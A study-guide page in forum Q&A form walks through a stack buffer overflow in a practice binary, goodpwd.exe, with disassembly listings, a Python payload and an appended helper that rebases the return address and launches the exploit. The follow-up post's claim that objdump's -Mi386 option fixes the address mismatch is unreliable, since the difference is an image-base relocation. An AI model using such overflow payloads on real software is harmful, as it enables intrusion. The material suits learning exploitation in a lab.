Understanding Buffer Overflows - Study Guide

I’m facing an issue when trying to exploit the buffer overflow in goodpwd.exe.

This is my environment:

  • VirtualBox with Windows 7
  • MSYS2 32-bit
  • Immunity Debugger

My objdump output:

004015ec <__Z11bf_overflowPc>:
  4015ec:	55                   	push   ebp
  4015ed:	89 e5                	mov    ebp,esp
  4015ef:	83 ec 28             	sub    esp,0x28
  4015f2:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
  4015f5:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
  4015f9:	8d 45 ee             	lea    eax,[ebp-0x12]
  4015fc:	89 04 24             	mov    DWORD PTR [esp],eax
  4015ff:	e8 e4 6b 00 00       	call   4081e8 <_strcpy>
  401604:	b8 00 00 00 00       	mov    eax,0x0
  401609:	c9                   	leave  
  40160a:	c3                   	ret    

0040160b <__Z13good_passwordv>:
  40160b:	55                   	push   ebp
  40160c:	89 e5                	mov    ebp,esp
  40160e:	83 ec 18             	sub    esp,0x18
  401611:	c7 04 24 44 a0 40 00 	mov    DWORD PTR [esp],0x40a044
  401618:	e8 93 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  40161d:	c7 04 24 60 a0 40 00 	mov    DWORD PTR [esp],0x40a060
  401624:	e8 87 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401629:	90                   	nop
  40162a:	c9                   	leave  
  40162b:	c3                   	ret    

0040162c <_main>:
  40162c:	55                   	push   ebp
  40162d:	89 e5                	mov    ebp,esp
  40162f:	83 e4 f0             	and    esp,0xfffffff0
  401632:	83 ec 20             	sub    esp,0x20
  401635:	e8 66 01 00 00       	call   4017a0 <___main>
  40163a:	c7 44 24 1c 00 00 00 	mov    DWORD PTR [esp+0x1c],0x0
  401641:	00 
  401642:	c7 04 24 81 a0 40 00 	mov    DWORD PTR [esp],0x40a081
  401649:	e8 62 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  40164e:	8b 45 0c             	mov    eax,DWORD PTR [ebp+0xc]
  401651:	83 c0 04             	add    eax,0x4
  401654:	8b 00                	mov    eax,DWORD PTR [eax]
  401656:	89 04 24             	mov    DWORD PTR [esp],eax
  401659:	e8 8e ff ff ff       	call   4015ec <__Z11bf_overflowPc>
  40165e:	83 7c 24 1c 01       	cmp    DWORD PTR [esp+0x1c],0x1
  401663:	75 07                	jne    40166c <_main+0x40>
  401665:	e8 a1 ff ff ff       	call   40160b <__Z13good_passwordv>
  40166a:	eb 0c                	jmp    401678 <_main+0x4c>
  40166c:	c7 04 24 9d a0 40 00 	mov    DWORD PTR [esp],0x40a09d
  401673:	e8 38 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401678:	c7 04 24 b2 a0 40 00 	mov    DWORD PTR [esp],0x40a0b2
  40167f:	e8 2c ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401684:	b8 00 00 00 00       	mov    eax,0x0
  401689:	c9                   	leave  
  40168a:	c3                   	ret    

Immunity Debugger output:

00EE15EC  /$ 55             PUSH EBP
00EE15ED  |. 89E5           MOV EBP,ESP
00EE15EF  |. 83EC 28        SUB ESP,28
00EE15F2  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]             ; |
00EE15F5  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX             ; |
00EE15F9  |. 8D45 EE        LEA EAX,DWORD PTR SS:[EBP-12]            ; |
00EE15FC  |. 890424         MOV DWORD PTR SS:[ESP],EAX               ; |
00EE15FF  |. E8 E46B0000    CALL <JMP.&msvcrt.strcpy>                ; \strcpy
00EE1604  |. B8 00000000    MOV EAX,0
00EE1609  |. C9             LEAVE
00EE160A  \. C3             RETN
00EE160B  /$ 55             PUSH EBP
00EE160C  |. 89E5           MOV EBP,ESP
00EE160E  |. 83EC 18        SUB ESP,18
00EE1611  |. C70424 44A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA044  ;  ASCII "Valid password supplied\n"
00EE1618  |. E8 93FFFFFF    CALL goodpwd.00EE15B0
00EE161D  |. C70424 60A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA060  ;  ASCII "This is good_password function \n"
00EE1624  |. E8 87FFFFFF    CALL goodpwd.00EE15B0
00EE1629  |. 90             NOP
00EE162A  |. C9             LEAVE
00EE162B  \. C3             RETN
00EE162C  /$ 55             PUSH EBP
00EE162D  |. 89E5           MOV EBP,ESP
00EE162F  |. 83E4 F0        AND ESP,FFFFFFF0
00EE1632  |. 83EC 20        SUB ESP,20
00EE1635  |. E8 66010000    CALL goodpwd.00EE17A0
00EE163A  |. C74424 1C 0000>MOV DWORD PTR SS:[ESP+1C],0
00EE1642  |. C70424 81A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA081  ;  ASCII "You are in goodpwd.exe now\n"
00EE1649  |. E8 62FFFFFF    CALL goodpwd.00EE15B0
00EE164E  |. 8B45 0C        MOV EAX,DWORD PTR SS:[EBP+C]
00EE1651  |. 83C0 04        ADD EAX,4
00EE1654  |. 8B00           MOV EAX,DWORD PTR DS:[EAX]
00EE1656  |. 890424         MOV DWORD PTR SS:[ESP],EAX
00EE1659  |. E8 8EFFFFFF    CALL goodpwd.00EE15EC
00EE165E  |. 837C24 1C 01   CMP DWORD PTR SS:[ESP+1C],1
00EE1663  |. 75 07          JNZ SHORT goodpwd.00EE166C
00EE1665  |. E8 A1FFFFFF    CALL goodpwd.00EE160B
00EE166A  |. EB 0C          JMP SHORT goodpwd.00EE1678
00EE166C  |> C70424 9DA0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA09D  ;  ASCII "Invalid Password!!!\n"
00EE1673  |. E8 38FFFFFF    CALL goodpwd.00EE15B0
00EE1678  |> C70424 B2A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA0B2  ;  ASCII "Quitting sample1.exe\n"
00EE167F  |. E8 2CFFFFFF    CALL goodpwd.00EE15B0
00EE1684  |. B8 00000000    MOV EAX,0
00EE1689  |. C9             LEAVE
00EE168A  \. C3             RETN


As we can see, the addresses already differ.

Taking the objdump addresses into consideration and using a Python script like the one below, it never works; it seems I can’t jump correctly to the function goodpwd.

import os

# 22 bytes of filler: 18 bytes from the buffer at ebp-0x12 up to the
# saved EBP, plus the 4-byte saved EBP itself, so the next bytes land
# on the return address.
payload = "\x41" * 22
# Address of good_password as objdump prints it (0x0040160b), little-endian.
# The leading 0x00 byte is left off: the NUL terminator of argv[1] supplies it.
payload += "\x0b\x16\x40"

command = "goodpwd.exe %s" % payload

print(command)
os.system(command)

I don’t know why Immunity Debugger assigns different addresses compared with objdump, but the Python script is not working. When using the helper.cpp and changing the address to the one mentioned in the objdump output, it also fails.

Any suggestions? Is this related to using a virtual environment, or to using MSYS2 instead of the MinGW compiler?

Thank you

I was able to exploit the BOF by pointing to the address that appears in Immunity.
After some troubleshooting I found that the culprit was the options used with objdump.
Probably this is related to the VirtualBox software.

When using objdump with the option -Mintel it gives a different result compared to Immunity Debugger, but if I use -Mi386 the result is exactly the same.

objdump -d -Mi386 is the correct option with a Windows 7 VM using VirtualBox.
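Added example, not part of either post above: a small Python helper that derives the two numbers the question and the follow-up turn on directly from the listings on this page. `ret_offset` reads the 22-byte filler off the `lea eax,[ebp-0x12]` frame layout (18 bytes up to the saved EBP plus the 4-byte saved EBP itself), `rebase` maps an objdump address to the debugger's view using the one relationship both listings show (every address differs by the same delta, 0x00EE0000 versus 0x00400000, while the low 16 bits such as 0x160B are identical), and `build_payload` packs the target little-endian and refuses an address with an interior NUL, which neither argv nor strcpy can carry. The image bases, the target path `goodpwd.exe` and the use of `subprocess` instead of `os.system` are my assumptions for the example; the page does not say why the module landed at a different base.

```python
import struct
import subprocess
import sys

# Added example: the numbers below are read off the page's two listings.
# Frame layout of bf_overflow as objdump shows it:
#   sub  esp,0x28          ; locals + outgoing strcpy arguments
#   lea  eax,[ebp-0x12]    ; destination buffer starts 18 bytes below saved EBP
#   call strcpy            ; no length check on argv[1]
BUF_DISP = 0x12          # buffer begins at ebp-0x12
SAVED_EBP_SIZE = 4       # 32-bit frame pointer stored at [ebp]

# objdump prints link-time addresses (image base 0x00400000); the debugger
# shows where the same module actually sits in this process (0x00EE0000).
# Both bases are assumptions taken from the page's listings.
LINK_BASE = 0x00400000
RUNTIME_BASE = 0x00EE0000
GOOD_PASSWORD_LINK = 0x0040160B   # <__Z13good_passwordv> in the objdump listing


def ret_offset(buf_disp=BUF_DISP):
    """Bytes from the start of the buffer to the saved return address.

    The stack grows downward, so above the buffer sit the saved EBP and
    then the return address:  [buf: buf_disp bytes][saved ebp: 4][ret: 4]
    """
    return buf_disp + SAVED_EBP_SIZE


def rebase(addr, link_base=LINK_BASE, runtime_base=RUNTIME_BASE):
    """Map a link-time address to the runtime address of the same byte.

    Relocation moves the whole image, so the offset inside the image (RVA)
    is preserved and only the base changes.
    """
    rva = addr - link_base
    return runtime_base + rva


def build_payload(target, offset=None):
    """argv[1] bytes that land `target` on bf_overflow's return address."""
    offset = ret_offset() if offset is None else offset
    addr = struct.pack("<I", target)      # x86 stores the address little-endian
    # A C string cannot contain an interior 0x00: strcpy stops copying there
    # and argv cannot deliver it either. Trailing zeros are fine because the
    # NUL that terminates argv[1] is copied by strcpy and fills them in.
    trimmed = addr.rstrip(b"\x00")
    if b"\x00" in trimmed:
        raise ValueError("interior NUL byte in target 0x%08x" % target)
    return b"A" * offset + trimmed


def run_target(exe, payload):
    """Start the target with the payload as its single argument.

    Passing a list avoids cmd.exe re-parsing the bytes, which is what the
    os.system() route does. Bytes >= 0x80 (e.g. 0xEE of the runtime address)
    only survive if the console code page maps them back to the same value.
    """
    return subprocess.run([exe, payload.decode("latin-1")]).returncode


if __name__ == "__main__":
    exe = sys.argv[1] if len(sys.argv) > 1 else "goodpwd.exe"   # assumed path
    target = rebase(GOOD_PASSWORD_LINK)
    print("return address offset: %d" % ret_offset())
    print("good_password at runtime: 0x%08x" % target)
    sys.exit(run_target(exe, build_payload(target)))
```

Run it inside the debugger session whose base you read off (`python payload.py goodpwd.exe`); if the module is loaded at yet another base on the next run, only `RUNTIME_BASE` changes, the offset and the RVA do not.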